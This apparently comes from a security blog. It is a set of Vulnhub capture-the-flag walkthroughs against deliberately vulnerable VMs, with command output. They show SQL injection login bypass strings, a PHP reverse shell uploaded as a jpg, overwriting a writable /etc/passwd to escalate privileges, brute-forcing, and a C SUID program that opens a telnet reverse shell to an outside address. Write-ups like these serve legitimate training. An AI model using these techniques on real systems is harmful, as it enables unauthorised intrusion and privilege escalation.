Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8008/tcp open  http
MAC Address: 00:0C:29:86:05:34 (VMware)

Well, the whole web app is in Albanian so this will be an extra challenge.

root@mrb3n:~# curl -s http://192.168.253.136:8008/
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>HackDay Albania 2016</title>
	<link rel="stylesheet" href="js/jquery-ui.css">
	<script src="js/jquery-3.1.1.min.js"></script>
	<script src="js/jquery-ui.js"></script>
	<style type="text/css">
		body {
			background-image: url("bg.png");
			background-repeat: no-repeat;
			background-size: cover;
		}
		.ui-draggable .ui-dialog-titlebar{
			background-color: #f05b43;
		}
		.ui-dialog .ui-dialog-title{
			color: white;
		}

	</style>
	<script>
		$(document).ready(function(){
			$("#dialog").dialog();
		});
	</script>
</head>
<body>
	<div id="dialog" title="Miresevini">
  <p>Ne qofte se jam UNE, e di se ku te shkoj ;)</p>
</div>

<!--OK ok, por jo ketu :)-->
</body>

A few very rough translations thanks to Google translate:

Miresevini = Welcome

Ne qofte se jam UNE, e di se ku te shkoj 😉 =  
If I am, I know where to go;)


OK ok, por jo ketu 🙂 = Ok ok, but not here 🙂

Fire Dirb against it and got a robots.txt file and not much else.

root@mrb3n:~# dirb http://192.168.253.136:8008/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov 19 22:25:48 2016
URL_BASE: http://192.168.253.136:8008/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.253.136:8008/ ----
+ http://192.168.253.136:8008/index.html (CODE:200|SIZE:750)                   
==> DIRECTORY: http://192.168.253.136:8008/js/                                 
+ http://192.168.253.136:8008/robots.txt (CODE:200|SIZE:702)                   
+ http://192.168.253.136:8008/server-status (CODE:403|SIZE:305)                
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/ ----
==> DIRECTORY: http://192.168.253.136:8008/js/external/                        
==> DIRECTORY: http://192.168.253.136:8008/js/images/                          
+ http://192.168.253.136:8008/js/index.html (CODE:200|SIZE:165)                
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/external/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Nov 19 22:25:51 2016
DOWNLOADED: 9224 - FOUND: 4
root@mrb3n:~# curl -s http://192.168.253.136:8008/robots.txt
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Ok, that’s a bunch to browse to by hand. I check out one and I can only assume most of them are like this:

Google translate tells me this roughly translates to: “Is this the proper directory, or are you a jerk?”

OK, so I’m thinking my next step is to figure out a valid directory. First cut out just the directory names from the robots.txt file:

root@mrb3n:~# curl -s http://192.168.253.136:8008/robots.txt | cut -f2 -d "/" > robots.txt
root@mrb3n:~# cat robots.txt 
rkfpuzrahngvat
slgqvasbiohwbu
tmhrwbtcjpixcv
vojtydvelrkzex
wpkuzewfmslafy
xqlvafxgntmbgz
yrmwbgyhouncha
zsnxchzipvodib
atoydiajqwpejc
bupzejbkrxqfkd
cvqafkclsyrgle
unisxcudkqjydw
dwrbgldmtzshmf
exschmenuating
fytdinfovbujoh
gzuejogpwcvkpi
havfkphqxdwlqj
ibwglqiryexmrk
jcxhmrjszfynsl
kdyinsktagzotm
lezjotlubhapun
mfakpumvcibqvo
ngblqvnwdjcrwp
ohcmrwoxekdsxq
pidnsxpyfletyr
Qjeotyqzgmfuzs

Prepend the URL to each with awk

root@mrb3n:~# awk '{print "http://192.168.253.136:8008/" $0;}' robots.txt > dir.txt
root@mrb3n:~# cat dir.txt 
http://192.168.253.136:8008/rkfpuzrahngvat
http://192.168.253.136:8008/slgqvasbiohwbu
http://192.168.253.136:8008/tmhrwbtcjpixcv
http://192.168.253.136:8008/vojtydvelrkzex
http://192.168.253.136:8008/wpkuzewfmslafy
http://192.168.253.136:8008/xqlvafxgntmbgz
http://192.168.253.136:8008/yrmwbgyhouncha
http://192.168.253.136:8008/zsnxchzipvodib
http://192.168.253.136:8008/atoydiajqwpejc
http://192.168.253.136:8008/bupzejbkrxqfkd
http://192.168.253.136:8008/cvqafkclsyrgle
http://192.168.253.136:8008/unisxcudkqjydw
http://192.168.253.136:8008/dwrbgldmtzshmf
http://192.168.253.136:8008/exschmenuating
http://192.168.253.136:8008/fytdinfovbujoh
http://192.168.253.136:8008/gzuejogpwcvkpi
http://192.168.253.136:8008/havfkphqxdwlqj
http://192.168.253.136:8008/ibwglqiryexmrk
http://192.168.253.136:8008/jcxhmrjszfynsl
http://192.168.253.136:8008/kdyinsktagzotm
http://192.168.253.136:8008/lezjotlubhapun
http://192.168.253.136:8008/mfakpumvcibqvo
http://192.168.253.136:8008/ngblqvnwdjcrwp
http://192.168.253.136:8008/ohcmrwoxekdsxq
http://192.168.253.136:8008/pidnsxpyfletyr
http://192.168.253.136:8008/qjeotyqzgmfuzs

Open each quick with the web browswer:

root@mrb3n:~# iceweasel $(cat dir.txt)

All but one give us the same error message: /unisxcudkqjydw

Checking it out gives us a hint to another directory:

root@mrb3n:~# curl -s http://192.168.253.136:8008/unisxcudkqjydw/
IS there any /vulnbank/ in there ???

Vulnbank is where we want to be:

root@mrb3n:~# curl -L http://192.168.253.136:8008/unisxcudkqjydw/vulnbank
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /unisxcudkqjydw/vulnbank</title>
 </head>
 <body>
<h1>Index of /unisxcudkqjydw/vulnbank</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/unisxcudkqjydw/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="client/">client/</a></td><td align="right">2016-05-23 00:27  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.253.136 Port 8008</address>
</body></html>

I move onward to the ‘client’ directory and am presented with a login page for the Very Secure Bank.

I throw a single quote in the username field and get the following error message:

I’m feeling lazy so I throw it into sqlmap but something was being filtered in the back end. I couldn’t get sqlmap to work with or without any tamper scripts aside from confirming the SQLi so I turned to Burp.

root@mrb3n:~# sqlmap -u 'http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/login.php' --data='username=*&password=test' --dbms=mysql --risk=3 --level=5 --dbs

………………snip…………………..

[22:48:52] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[22:48:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
[22:49:03] [INFO] (custom) POST parameter '#1*' seems to be 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)' injectable 

Fuzzing with Burp Intruder shows me that certain keywords appear to be filtered such as ‘AND’ and ‘OR’.

Perhaps we can bypass the login?

Statements such as ‘ OR ‘a’=’a’ would not work based on the keyword filtering. Special characters appeared to be filtered as well. Many many fuzzing attempts and I finally was able to log in directly with the following string: ‘%20#;–%20- which would be the following without the URL encoding:

' #;-- -

Basically, the single quote would force bypass the password check and log me in directly as the first user in the database by executing a query such as this:

"SELECT * FROM users WHERE username='$username' AND password='$password'"

but terminating after the username check and commenting out the remainder of the query. All you actually need was the ‘%20# as the remainder after the # would be superfluous.

I tried to upload a .php file but received the following error:

OK, lets try with a jpg file. I grabbed a php reverse shell and renamed it with a jpg extension and the system seemed to like it:

The page source gave me the location of the file:

I started a netcat listener and browsed to the file located at:

http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=albania.jpg

I got a hit right away, used Python to grab a proper tty (Python 2 was missing from the system):

root@mrb3n:/var/www/html# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.253.134] from (UNKNOWN) [192.168.253.136] 37742
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 23:19:42 up 16 min,  0 users,  load average: 0.00, 0.01, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@hackday:/$

Ok, we’re in. Taking a look around the system I see one user ‘taviso’ with an empty home directory:

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
…………………..snip………………………………………
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash

All of the files in /var/www/html are owned by this user and the account is in the sudo group so it must be significant:

www-data@hackday:/tmp$ cat /etc/group | grep taviso
cat /etc/group | grep taviso
adm:x:4:syslog,taviso
cdrom:x:24:taviso
sudo:x:27:taviso
dip:x:30:taviso
plugdev:x:46:taviso
lxd:x:110:taviso
taviso:x:1000:
lpadmin:x:117:taviso
sambashare:x:118:taviso

I found a the MySQL DB root password in the config.php file but that did not work either did any of the passwords in the database. I fired off SSH brute-forcing with Hydra and the ‘taviso’ user and went about my enumeration.

A search for world-writeable files showed that /etc/passwd was writeable.

www-data@hackday:/tmp$ find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
< / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null                   
/etc/passwd
.........snip.........

Well, I should be able to edit this file and either set a new root password, add a  user or change this user’s password. Let’s change taviso’s password.

I first use Python to generate a password hash:

root@mrb3n:/var/www/html# python -c 'import crypt; print crypt.crypt("pass123", "$6$salt")'
$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1

I then grabbed the /etc/passwd file and created a quick shell script offline that would just echo out the contents of the file without losing any special characters:

root@mrb3n:/var/www/html# cat passwd.sh 
cat << "EOF"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1:1000:1000:Taviso,,,:/home/taviso:/bin/bash

EOF

I pulled it over to the host and gave the script executable permissions:

wget http://192.168.253.134/passwd.sh
--2016-11-21 16:06:57--  http://192.168.253.134/passwd.sh
Connecting to 192.168.253.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1734 (1.7K) [text/x-sh]
Saving to: 'passwd.sh'

passwd.sh           100%[===================>]   1.69K  --.-KB/s    in 0s      

2016-11-21 16:06:57 (385 MB/s) - 'passwd.sh' saved [1734/1734]


www-data@hackday:/tmp$ chmod +x passwd.sh
chmod +x passwd.sh

I ran the script to overwrite the contents of /etc/passwd with the modified version I created offline:

www-data@hackday:/tmp$ ./passwd.sh > /etc/passwd
./passwd.sh > /etc/passwd

Verifying the new file was created properly:

www-data@hackday:/tmp$ cat /etc/passwd
cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1:1000:1000:Taviso,,,:/home/taviso:/bin/bash

Now I should be able to su to the user ‘taviso’ and from there elevate to root.

www-data@hackday:/tmp$ su taviso
su taviso
Password: pass123

taviso@hackday:/tmp$

Cool, that worked. Now we verify our sudo permissions for laughs. The user can perform any actions as root. Score!

taviso@hackday:/tmp$ sudo -l
[sudo] password for taviso: 
Matching Defaults entries for taviso on hackday:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User taviso may run the following commands on hackday:
    (ALL : ALL) ALL

Now we just su to root and grab our prize:

taviso@hackday:/tmp$ sudo su
sudo su
[sudo] password for taviso: pass123


root@hackday:/tmp#

And the flag:

root@hackday:~# cat flag.txt
cat flag.txt
Urime, 
Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5

Google translate told me the flag text translates to “Congratulations, now the report begins.”

The md5 was a hash of “rio”.

Now for the heck of it I could SSH in directly as the ‘taviso’ user and have a further look around.

root@mrb3n:~# ssh taviso@192.168.253.138
taviso@192.168.253.138's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

6 packages can be updated.
2 updates are security updates.


Last login: Sat Oct 29 23:07:00 2016
taviso@hackday:~$ sudo su
[sudo] password for taviso: 
root@hackday:/home/taviso

Here is the function in config.php responsible for the authentication bypass. Sanitize  your input!

function check_login($username,$password){
	
	

	$username = str_ireplace("OR", "", $username);
	$username = str_ireplace("UNION", "", $username);
	$username = str_ireplace("AND", "", $username);
	$password = str_ireplace("'","",$password);
	$sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
	$result = mysqli_fetch_assoc(execute_query($sql_query));
	$result = $result["ID"];
	if($result >= 1){
		return $result;
	}else{
		return -1;
		}

And the MySQL credentials in cleartext in the config.php file:

function execute_query($sql){


	$db_host = "127.0.0.1";
	$db_name = "bank_database";
	$db_user = "root";
	$db_password = "NuCiGoGo321";

Enjoyable VM with a privilege escalation method I hadn’t seen on Vulhub yet. Thanks to r_73en for putting it together and sharing as well as  @g0tmi1k and the @vulnhub team for continuing to maintain this community.

Teuchter vulnhub walkthrough

When knightmare asked me to test his latest boot2root based around Scottish culture/slang I jumped at the opportunity. Having chatted quite a bit and debugging issues on other VMs I had already picked up several colorful Scottish expressions but boy was I in for a ride!

Gaun yersel!!!

Image result for irn bru

You can grab the VM here: https://www.vulnhub.com/entry/teuchter-03,163/

As always I imported the VM and fired off an nmap scan. This one only gave me port 80 to work with.

Hitting the web server I was greeted by Willie from the Simpsons telling me to stay out of his server, we’ll see about that.

I checked the page source and noted down several hints including possible usernames and directories.

Images will open doors. Perhaps some stego or exif madness? I grabbed all the images down locally to have a look.

Amazing shot!

Well, the ‘flicks’ directory was forbidden:

…and the ‘telly’ directory gave me more clues (and confusion):

More hints. At this point my head was spinning!

 

Focusing on the phpinfo hint I tried browsing to /flicks/phpinfo.php but that would be too easy. Firing off Burp intruder with a list of known file extensions finally got me a hit for phpinfo.pht. Nice troll.

The clue about images opening doors made me think I was looking for some sort of backdoor. I re-scanned to see if any additional ports had opened.  Googling for “php backdoors” gave me this link as the first hit: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html.

Sure enough I was able to use this technique to gain command execution:

I uploaded a PHP reverse shell but could not get it working (I’d come to find out why later on).

Turning to this great reverse shell cheat sheet I decided to use the trust mknod technique to fire myself a reverse shell.

Ok, now we’re in as www-data:

I was stuck here for quite some time, after much enumeration I took a look for SUID files and came up with a txt file in the /home/proclaimers directory, which was strange.

The file talked about wildcards. Possible privilege escalation?

Some more enumeration turned up a hint in the login.txt file, alluding to a password hidden within an image file. I had already checked out every image though!

Well, in this case knightmare was being literal and the password was right in front of me, in the form of the filename.

Once I switched over to the jkerr user I looked around quite a bit but did not find anything useful. Taking a look at the list of users I decided to Google for who cpgrogran could be.

Based on this Wikipedia article Clair Grogan was best known as the lead singer of a band ‘Altered Images’.  After bouncing my head off the keyboard for some time, once again I had another password.

 Once switched over to the cpgrogan user I was able to browse around the home directory and found yet another reference to wild cards.

At this point I needed to gain access as one more user, ‘proclaimers’. There were a few images left and the comment ‘images open doors’ was still burned in my mind so I pulled them down via Python 3 http.server (which btw I had to use because Knightmare removed the Python2 binary… thanks for that one 🙂 )

The ‘promisedyouamiracle’ image appeared to have an interested base64 encoded string in the exif data.

The string decoded to ‘gemini’. C’mon password!

It worked! OK! Now I was in as theproclaimers, what was the next step?

Looking around forever I landed on an interesting shell script ‘numpties.sh’. The script showed why I had trouble with my PHP reverse shell as well as why I couldn’t use wget to upload anything haha. It shows us that any file named ‘semaphore’ placed in the /home/proclaimers/letterfromamerica directory would have its permissions changed to be own by root and the SUID bit set. Smells like privilege escalation. I also assumed that the shell script must be running on a cron job.

At this point I needed a simple binary that, once compiled and having the permissions/ownership changed with this cron job, could be leveraged to fire me a root shell.

This simple script did the job:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
  setuid( 0 );
  system( "mknod backpipe p; telnet 192.168.110.175 443 0<backpipe | /bin/bash 1>backpipe" );
  return 0;
}

I compiled it locally and downloaded it using Curl thanks to knightmare’s trolling.

I started up a netcat listener and waited. Not too long after I had a hit and had a root shell! Well, we all know by now that knightmare’s VMs are not over with root and this one was no exception! Onwards to the final flag…and on and on and on. More trolling, I was sweating by this time.

Eventually I got to the bottom of the rabbit hole and found a zip file with what I could only imagine would be a disk image inside.

Of course the zip was password protected and nothing worked. I went back and made a word list from everything I had seen so far. Nada! Eventually out of sheer desperation I tried ‘Teuchter’ and immediately wanted to strange knightmare through the screen.

The zip contained a virtual disk image. I tried to mount it, cut it up with strings and binwalk but nothing worked. Exploring a bit more with my shiny new root privileges gave me another hint within the crontabs file:

## So vmfs-tools package eh....?
*/5 * * * * /bin/sh /usr/local/bin/numpties.sh > /dev/null 2>&1

Some Googling showed me I could mount the disk image as a new drive and use the vmfs-tools package to explore it. I added the image as a new drive under sda2:

root@mrb3n:~/Desktop/teuch# fdisk -l

Disk /dev/sda: 30 GiB, 32212254720 bytes, 62914560 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xb2d1b90f

Device     Boot    Start      End  Sectors  Size Id Type
/dev/sda1  *        2048 60262399 60260352 28.8G 83 Linux
/dev/sda2       60264446 62912511  2648066  1.3G  5 Extended
/dev/sda5       60264448 62912511  2648064  1.3G 82 Linux swap / Solaris

I then used vmfs-fuse to mount the drive and explore it:

root@mrb3n:~/Desktop/teuch# vmfs-fuse /dev/sdb1 /mnt/teuch

root@mrb3n:~/Desktop/teuch# cd /mnt/teuch/

Red Kola? Irn Bru? More hints!

Almost there.. Check the ISO and remember password relates to the TV Advert you watched.

I took out the spaces but it’s 25 characters but the Wikipedia page will get it for you.

This was either another troll or knightmare was showing some mercy.  From all the hints I was guessing the final flag was hidden inside the glass_ch.jpg image. I could probably pull it out with steghide but I still needed a 25 character password.  After going back to the beginning and reviewing everything I had once again I came up with ‘madeinscotlandfromgirders’ as the password.

I copied the image file over to a Windows VM where I had steghide from a previous CTF and FINALLY had the “real” flag after so many “almosts”.

This was an awesome VM, a mixture of entertaining and extremely frustrating. I learned a bunch about Scottish culture and could finally decode some of the things knightmare was saying.

Thanks to knightmare for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

This glossary of Scottish slang and Jargon also came in handy: https://en.wiktionary.org/wiki/Appendix:Glossary_of_Scottish_slang_and_jargon#G

SkyDog 2016: Catch Me If You Can Vulnhub Walkthrough

A new VM was released on Vulnhub this week. I had some downtime at night while traveling for work so I grabbed the image and got to work.

https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/

The challenge is set up with 8 flags as follows:

Flag#1 – “Don’t go Home Frank! There’s a Hex on Your House”
Flag#2 – “Obscurity or Security? That is the Question”
Flag#3 – “During his Travels Frank has Been Known to Intercept Traffic”
Flag#4 – “A Good Agent is Hard to Find”
Flag#5 – “The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices”
Flag#6 – “Where in the World is Frank?”
Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”
Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”

I always enjoy challenges like this with multiple flags as it helps to keep you going/on path.

I started off with an nmap scan to see what we were dealing with:

root@kali:~# nmap -A -p- -Pn --open -T4 172.16.94.136

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-11-11 09:08 EST
Nmap scan report for 172.16.94.136
Host is up (0.00039s latency).
Not shown: 65531 filtered ports, 1 closed port
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
443/tcp   open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
| ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
| Not valid before: 2016-09-21T14:51:57
|_Not valid after:  2017-09-21T14:51:57
|_ssl-date: TLS randomness does not represent time
22222/tcp open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
|_  256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
MAC Address: 00:0C:29:14:57:58 (VMware)
Device type: general purpose|phone|WAP|specialized|storage-misc

A web server listening on port 80 and 443 as well as an SSH service on a non-standard port.

I went a bit out of order with the flags so the clues do not match up exactly. I checked out the SSH service first and the banner gave up a flag.

root@kali:~# ssh 172.16.94.136 -p 22222
The authenticity of host '[172.16.94.136]:22222 ([172.16.94.136]:22222)' can't be established.
ECDSA key fingerprint is SHA256:DeCMZ74o5wesBHFLyaVY7UTCA7mW+bx6WroHm6AgMqU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[172.16.94.136]:22222' (ECDSA) to the list of known hosts.
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
root@172.16.94.136's password:

The flag was the MD5 of the word ‘encrypt’.

I spun my wheels for a while on the next flag, after running Burp and Dirbuster for a while and not coming up with anything new I decided to go file by file. One of the JavaScript files had an interesting comment, in Hex, which was one of the clues.

root@kali:~# curl -s http://172.16.94.136/oldIE/html5.js
/* 666c61677b37633031333230373061306566373164353432363633653964633166356465657d */
/*! HTML5 Shiv v3.6 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed */
/* Source: https://github.com/aFarkas/html5shiv — No longer maintained */
.......................snip......................

Decoding the Hex with Python gave me the next flag, which was the MD5 of ‘nmap’ which must be the hint for the SSH banner flag.

root@kali:~# python
Python 2.7.12+ (default, Sep  1 2016, 20:27:38) 
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b37633031333230373061306566373164353432363633653964633166356465657d".decode('hex')
'flag{7c0132070a0ef71d542663e9dc1f5dee}'
>>>

Dirbuster turned up a protected page. Browsing to it gave me an error message. My first thought was changing my user-agent. I first attempted with Burp Intruder and a large user-agent list but did not get any hits.

root@kali:~# curl -s http://172.16.94.136/personnel
ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....

Digging around for quite some time led me back to the same JavaScript file with some more interesting comments. The FBI page was expecting my UA to be IE 4.0. Super secure!

Changing my UA to IE 4.0 in Burp Repeater got me access to the FBI Portal page.

I set up a match/replace rule in Burp to make it easier to browse the site directly.

 

The FBI Portal page was all static content, but I did get the next flag (which cracked to ‘evidence’) as well as a clue “new+flag”.

Following the hint brought me to a password protected page.

Basic-auth can be brute-forced with Burp Intruder but I first needed a username. The JavaScript file from earlier gave us a user name and the login prompt states “FBI Personnel” so I followed the username format and configured Intruder to attempt a brute-force with the user ‘carl.hanratty’.

I set up Burp like so:

The username in position 1 with a ‘:’ separate and base64 encoding to properly format the payloads for basic-auth.

I used a large wordlist and eventually got a hit, the 301 redirect indicated a successful login.

I checked the string for the valid password.

root@kali:/# echo Y2FybC5oYW5yYXR0eTpHcmFjZQ== | base64 -d
carl.hanratty:Grace

I was greeted with an FBI evidence page which gave me my next flag (which cracked to ‘panam’).

As well as a PDF document that did not yield anything upon inspection.

